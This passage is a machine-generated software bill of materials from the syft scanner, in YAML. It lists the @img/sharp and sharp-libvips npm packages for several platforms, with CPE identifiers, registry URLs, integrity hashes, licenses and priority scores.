cpe:2.3:a:\@img\/sharp_darwin:\@img\/sharp_darwin_x64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-darwin-x64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_darwin_x64:0.34.5:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40img/sharp-darwin-x64@0.34.5 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@img/sharp-darwin-x64/-/sharp-darwin-x64-0.34.5.tgz integrity: sha512-YNEFAF/4KQ/PeW0N+r+aVVsoIY0/qxxikF2SWdp+NRkmMB7y9LBZAVqQ4yhGCm/H3H270OSykqmQMKLBhBJDEw== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: f40ef319dfe0f7ca ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @img/sharp-libvips-darwin-arm64 1.2.4' title: '@img/sharp-libvips-darwin-arm64 1.2.4' description: 'Package discovered: @img/sharp-libvips-darwin-arm64 1.2.4' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: c127f66367bb283f name: '@img/sharp-libvips-darwin-arm64' version: 1.2.4 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: LGPL-3.0-or-later spdxExpression: LGPL-3.0-or-later type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@img\/sharp-libvips-darwin-arm64:\@img\/sharp-libvips-darwin-arm64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-libvips-darwin-arm64:\@img\/sharp_libvips_darwin_arm64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_libvips_darwin_arm64:\@img\/sharp-libvips-darwin-arm64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_libvips_darwin_arm64:\@img\/sharp_libvips_darwin_arm64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-libvips-darwin:\@img\/sharp-libvips-darwin-arm64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-libvips-darwin:\@img\/sharp_libvips_darwin_arm64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_libvips_darwin:\@img\/sharp-libvips-darwin-arm64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_libvips_darwin:\@img\/sharp_libvips_darwin_arm64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-libvips:\@img\/sharp-libvips-darwin-arm64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-libvips:\@img\/sharp_libvips_darwin_arm64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_libvips:\@img\/sharp-libvips-darwin-arm64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_libvips:\@img\/sharp_libvips_darwin_arm64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-libvips-darwin-arm64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_libvips_darwin_arm64:1.2.4:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40img/sharp-libvips-darwin-arm64@1.2.4 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@img/sharp-libvips-darwin-arm64/-/sharp-libvips-darwin-arm64-1.2.4.tgz integrity: sha512-zqjjo7RatFfFoP0MkQ51jfuFZBnVE2pRiaydKJ1G/rHZvnsrHAOcQALIi9sA5co5xenQdTugCvtb1cuf78Vf4g== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: f2d59ff4b7dad330 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @img/sharp-libvips-darwin-x64 1.2.4' title: '@img/sharp-libvips-darwin-x64 1.2.4' description: 'Package discovered: @img/sharp-libvips-darwin-x64 1.2.4' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 9896d5c1cacbd583 name: '@img/sharp-libvips-darwin-x64' version: 1.2.4 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: LGPL-3.0-or-later spdxExpression: LGPL-3.0-or-later type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@img\/sharp-libvips-darwin-x64:\@img\/sharp-libvips-darwin-x64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-libvips-darwin-x64:\@img\/sharp_libvips_darwin_x64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_libvips_darwin_x64:\@img\/sharp-libvips-darwin-x64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_libvips_darwin_x64:\@img\/sharp_libvips_darwin_x64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-libvips-darwin:\@img\/sharp-libvips-darwin-x64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-libvips-darwin:\@img\/sharp_libvips_darwin_x64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_libvips_darwin:\@img\/sharp-libvips-darwin-x64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_libvips_darwin:\@img\/sharp_libvips_darwin_x64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-libvips:\@img\/sharp-libvips-darwin-x64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-libvips:\@img\/sharp_libvips_darwin_x64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_libvips:\@img\/sharp-libvips-darwin-x64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_libvips:\@img\/sharp_libvips_darwin_x64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-libvips-darwin-x64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_libvips_darwin_x64:1.2.4:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40img/sharp-libvips-darwin-x64@1.2.4 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@img/sharp-libvips-darwin-x64/-/sharp-libvips-darwin-x64-1.2.4.tgz integrity: sha512-1IOd5xfVhlGwX+zXv2N93k0yMONvUlANylbJw1eTah8K/Jtpi15KC+WSiaX/nBmbm2HxRM1gZ0nSdjSsrZbGKg== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 7b39904a53a17a82 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @img/sharp-libvips-linux-arm 1.2.4' title: '@img/sharp-libvips-linux-arm 1.2.4' description: 'Package discovered: @img/sharp-libvips-linux-arm 1.2.4' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 35db8dcfe65acc63 name: '@img/sharp-libvips-linux-arm' version: 1.2.4 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: LGPL-3.0-or-later spdxExpression: LGPL-3.0-or-later type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@img\/sharp-libvips-linux-arm:\@img\/sharp-libvips-linux-arm:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-libvips-linux-arm:\@img\/sharp_libvips_linux_arm:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_libvips_linux_arm:\@img\/sharp-libvips-linux-arm:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_libvips_linux_arm:\@img\/sharp_libvips_linux_arm:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-libvips-linux:\@img\/sharp-libvips-linux-arm:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-libvips-linux:\@img\/sharp_libvips_linux_arm:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_libvips_linux:\@img\/sharp-libvips-linux-arm:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_libvips_linux:\@img\/sharp_libvips_linux_arm:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-libvips:\@img\/sharp-libvips-linux-arm:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-libvips:\@img\/sharp_libvips_linux_arm:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_libvips:\@img\/sharp-libvips-linux-arm:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_libvips:\@img\/sharp_libvips_linux_arm:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-libvips-linux-arm:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_libvips_linux_arm:1.2.4:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40img/sharp-libvips-linux-arm@1.2.4 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@img/sharp-libvips-linux-arm/-/sharp-libvips-linux-arm-1.2.4.tgz integrity: sha512-bFI7xcKFELdiNCVov8e44Ia4u2byA+l3XtsAj+Q8tfCwO6BQ8iDojYdvoPMqsKDkuoOo+X6HZA0s0q11ANMQ8A== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 24ce05de10ecc79e ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @img/sharp-libvips-linux-arm64 1.2.4' title: '@img/sharp-libvips-linux-arm64 1.2.4' description: 'Package discovered: @img/sharp-libvips-linux-arm64 1.2.4' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: b77c206e5d189694 name: '@img/sharp-libvips-linux-arm64' version: 1.2.4 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: LGPL-3.0-or-later spdxExpression: LGPL-3.0-or-later type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@img\/sharp-libvips-linux-arm64:\@img\/sharp-libvips-linux-arm64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-libvips-linux-arm64:\@img\/sharp_libvips_linux_arm64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_libvips_linux_arm64:\@img\/sharp-libvips-linux-arm64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_libvips_linux_arm64:\@img\/sharp_libvips_linux_arm64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-libvips-linux:\@img\/sharp-libvips-linux-arm64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-libvips-linux:\@img\/sharp_libvips_linux_arm64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_libvips_linux:\@img\/sharp-libvips-linux-arm64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_libvips_linux:\@img\/sharp_libvips_linux_arm64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-libvips:\@img\/sharp-libvips-linux-arm64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-libvips:\@img\/sharp_libvips_linux_arm64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_libvips:\@img\/sharp-libvips-linux-arm64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_libvips:\@img\/sharp_libvips_linux_arm64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-libvips-linux-arm64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_libvips_linux_arm64:1.2.4:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40img/sharp-libvips-linux-arm64@1.2.4 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@img/sharp-libvips-linux-arm64/-/sharp-libvips-linux-arm64-1.2.4.tgz integrity: sha512-excjX8DfsIcJ10x1Kzr4RcWe1edC9PquDRRPx3YVCvQv+U5p7Yin2s32ftzikXojb1PIFc/9Mt28/y+iRklkrw== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 042fdfd641843c8d ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @img/sharp-libvips-linux-ppc64 1.2.4' title: '@img/sharp-libvips-linux-ppc64 1.2.4' description: 'Package discovered: @img/sharp-libvips-linux-ppc64 1.2.4' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 0a49b35ad8071788 name: '@img/sharp-libvips-linux-ppc64' version: 1.2.4 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: LGPL-3.0-or-later spdxExpression: LGPL-3.0-or-later type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@img\/sharp-libvips-linux-ppc64:\@img\/sharp-libvips-linux-ppc64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-libvips-linux-ppc64:\@img\/sharp_libvips_linux_ppc64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_libvips_linux_ppc64:\@img\/sharp-libvips-linux-ppc64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_libvips_linux_ppc64:\@img\/sharp_libvips_linux_ppc64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-libvips-linux:\@img\/sharp-libvips-linux-ppc64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-libvips-linux:\@img\/sharp_libvips_linux_ppc64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_libvips_linux:\@img\/sharp-libvips-linux-ppc64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_libvips_linux:\@img\/sharp_libvips_linux_ppc64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-libvips:\@img\/sharp-libvips-linux-ppc64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-libvips:\@img\/sharp_libvips_linux_ppc64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_libvips:\@img\/sharp-libvips-linux-ppc64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_libvips:\@img\/sharp_libvips_linux_ppc64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-libvips-linux-ppc64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_libvips_linux_ppc64:1.2.4:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40img/sharp-libvips-linux-ppc64@1.2.4 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@img/sharp-libvips-linux-ppc64/-/sharp-libvips-linux-ppc64-1.2.4.tgz integrity: sha512-FMuvGijLDYG6lW+b/UvyilUWu5Ayu+3r2d1S8notiGCIyYU/76eig1UfMmkZ7vwgOrzKzlQbFSuQfgm7GYUPpA== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 2eef65dffbde81a3 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @img/sharp-libvips-linux-riscv64 1.2.4' title: '@img/sharp-libvips-linux-riscv64 1.2.4' description: 'Package discovered: @img/sharp-libvips-linux-riscv64 1.2.4' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 69aa9726ceb1125a name: '@img/sharp-libvips-linux-riscv64' version: 1.2.4 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: LGPL-3.0-or-later spdxExpression: LGPL-3.0-or-later type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@img\/sharp-libvips-linux-riscv64:\@img\/sharp-libvips-linux-riscv64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-libvips-linux-riscv64:\@img\/sharp_libvips_linux_riscv64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_libvips_linux_riscv64:\@img\/sharp-libvips-linux-riscv64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_libvips_linux_riscv64:\@img\/sharp_libvips_linux_riscv64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-libvips-linux:\@img\/sharp-libvips-linux-riscv64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-libvips-linux:\@img\/sharp_libvips_linux_riscv64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_libvips_linux:\@img\/sharp-libvips-linux-riscv64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_libvips_linux:\@img\/sharp_libvips_linux_riscv64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-libvips:\@img\/sharp-libvips-linux-riscv64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-libvips:\@img\/sharp_libvips_linux_riscv64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_libvips:\@img\/sharp-libvips-linux-riscv64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_libvips:\@img\/sharp_libvips_linux_riscv64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-libvips-linux-riscv64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_libvips_linux_riscv64:1.2.4:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40img/sharp-libvips-linux-riscv64@1.2.4 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@img/sharp-libvips-linux-riscv64/-/sharp-libvips-linux-riscv64-1.2.4.tgz integrity: sha512-oVDbcR4zUC0ce82teubSm+x6ETixtKZBh/qbREIOcI3cULzDyb18Sr/Wcyx7NRQeQzOiHTNbZFF1UwPS2scyGA== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 48c4bc7216358207 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @img/sharp-libvips-linux-s390x 1.2.4' title: '@img/sharp-libvips-linux-s390x 1.2.4' description: 'Package discovered: @img/sharp-libvips-linux-s390x 1.2.4' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: b12e72c485584ae0 name: '@img/sharp-libvips-linux-s390x' version: 1.2.4 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: LGPL-3.0-or-later spdxExpression: LGPL-3.0-or-later type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@img\/sharp-libvips-linux-s390x:\@img\/sharp-libvips-linux-s390x:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-libvips-linux-s390x:\@img\/sharp_libvips_linux_s390x:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_libvips_linux_s390x:\@img\/sharp-libvips-linux-s390x:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_libvips_linux_s390x:\@img\/sharp_libvips_linux_s390x:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-libvips-linux:\@img\/sharp-libvips-linux-s390x:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-libvips-linux:\@img\/sharp_libvips_linux_s390x:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_libvips_linux:\@img\/sharp-libvips-linux-s390x:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_libvips_linux:\@img\/sharp_libvips_linux_s390x:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-libvips:\@img\/sharp-libvips-linux-s390x:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-libvips:\@img\/sharp_libvips_linux_s390x:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_libvips:\@img\/sharp-libvips-linux-s390x:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_libvips:\@img\/sharp_libvips_linux_s390x:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-libvips-linux-s390x:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_libvips_linux_s390x:1.2.4:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40img/sharp-libvips-linux-s390x@1.2.4 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@img/sharp-libvips-linux-s390x/-/sharp-libvips-linux-s390x-1.2.4.tgz integrity: sha512-qmp9VrzgPgMoGZyPvrQHqk02uyjA0/QrTO26Tqk6l4ZV0MPWIW6LTkqOIov+J1yEu7MbFQaDpwdwJKhbJvuRxQ== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 79972044480a2381 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @img/sharp-libvips-linux-x64 1.2.4' title: '@img/sharp-libvips-linux-x64 1.2.4' description: 'Package discovered: @img/sharp-libvips-linux-x64 1.2.4' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: a57b531e02329e6d name: '@img/sharp-libvips-linux-x64' version: 1.2.4 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: LGPL-3.0-or-later spdxExpression: LGPL-3.0-or-later type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@img\/sharp-libvips-linux-x64:\@img\/sharp-libvips-linux-x64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-libvips-linux-x64:\@img\/sharp_libvips_linux_x64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_libvips_linux_x64:\@img\/sharp-libvips-linux-x64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_libvips_linux_x64:\@img\/sharp_libvips_linux_x64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-libvips-linux:\@img\/sharp-libvips-linux-x64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-libvips-linux:\@img\/sharp_libvips_linux_x64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_libvips_linux:\@img\/sharp-libvips-linux-x64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_libvips_linux:\@img\/sharp_libvips_linux_x64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-libvips:\@img\/sharp-libvips-linux-x64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-libvips:\@img\/sharp_libvips_linux_x64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_libvips:\@img\/sharp-libvips-linux-x64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_libvips:\@img\/sharp_libvips_linux_x64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-libvips-linux-x64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_libvips_linux_x64:1.2.4:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40img/sharp-libvips-linux-x64@1.2.4 metadataType: javascript-npm-package-lock-entry metadata: resolved: 